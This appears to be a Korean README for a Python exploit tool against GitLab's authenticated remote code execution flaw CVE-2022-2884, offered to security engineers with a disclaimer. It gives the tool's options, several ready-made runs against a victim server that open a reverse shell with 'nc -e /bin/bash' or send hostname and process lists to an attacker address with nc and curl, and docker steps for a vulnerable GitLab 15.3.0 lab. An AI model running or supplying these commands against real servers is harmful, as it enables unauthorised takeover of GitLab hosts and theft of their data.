
CVE-2022-2884로 알려진 GitLab의 인증된 RCE 취약점을 악용합니다.
이 프로그램은 CVE-2022-2884로 알려진 GitLab 인증된 RCE 취약점을 이용하는 Python3 프로그램입니다.
이 도구는 보안 엔지니어와 앱시큐어(AppSec) 담당자가 보안 평가를 위해 사용하도록 설계되었습니다. 이 도구를 책임감 있게 사용해 주십시오. 본 도구를 사용하는 모든 방식에 대해 저는 책임을 지지 않습니다. 이 도구를 사용하여 발생한 피해나 저지른 범죄에 대해 저는 어떠한 책임도 지지 않습니다.
$ ./gitlab_rce_cve-2022-2884.py --help
usage: gitlab_rce_cve-2022-2884.py [-h] -u URL -pt PRIVATE_TOKEN [-tn TARGET_NAMESPACE] -a ADDRESS [-p PORT] [-s] -c COMMAND [-d DELAY] [-v]
GitLab 인증 RCE 취약점(CVE-2022-2884) 익스플로잇 - v1.0 (2022-12-25)
선택적 인수:
-h, --help 이 도움말 메시지를 표시하고 종료
-u URL, --url URL 대상 GitLab의 URL
-pt PRIVATE_TOKEN, --private-token PRIVATE_TOKEN
GitLab의 개인 토큰
-tn TARGET_NAMESPACE, --target-namespace TARGET_NAMESPACE
GitLab의 대상 네임스페이스 (기본값: 'root')
-a ADDRESS, --address ADDRESS
공격자 머신의 IP 주소
-p PORT, --port PORT 공격자 머신의 TCP 포트 (기본값: 1337)
-s, --https 공격자 머신이 HTTPS로 노출된 경우 설정
-c COMMAND, --command COMMAND
실행할 명령어
-d DELAY, --delay DELAY
익스플로잇 완료를 기다리는 지연 시간(초)
-v, --verbose 상세 모드
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "id | nc 1.2.3.4 6669"
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash"
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "(hostname; ps aux) | curl 1.2.3.4:6669 -X POST --data-binary @- "
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "echo 'test' > /tmp/test"
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash" -d 180
./gitlab_rce_cve-2022-2884.py -v -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -p 1337 -c "nc 1.2.3.4 6669 -e /bin/bash"
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -tn root -a 1.2.3.4 -p 1337 -s -c "nc 1.2.3.4 6669 -e /bin/bash"
다음 명령어를 사용하여 취약한 애플리케이션을 설정할 수 있습니다.
export GITLAB_HOME=/srv/gitlab
docker run --detach --rm \
--hostname gitlab.example.com \
--publish 443:443 --publish 80:80 --publish 22:22 \
--name vuln-gitlab \
--volume $GITLAB_HOME/config:/etc/gitlab \
--volume $GITLAB_HOME/logs:/var/log/gitlab \
--volume $GITLAB_HOME/data:/var/opt/gitlab \
--shm-size 256m \
gitlab/gitlab-ce:15.3.0-ce.0
Docker 컨테이너가 쿼리에 응답하기 시작할 때까지 시간이 걸릴 수 있습니다. 그런 다음 http://localhost에 연결하십시오.
사용자 이름 root와 다음 명령어의 비밀번호로 로그인하십시오.
docker exec -it vuln-gitlab grep 'Password:' /etc/gitlab/initial_root_password
로컬에서 익스플로잇을 테스트하려면 docker run 명령에 --network="host"를 추가하고 GitLab의 아웃바운드 요청 제약 조건을 제거해야 합니다:
127.0.0.1 추가익스플로잇의 전제 조건은 GitLab에 개인 토큰을 보유하는 것입니다:
api 범위의 토큰 생성자세한 내용은 LICENSE 파일을 참조하십시오.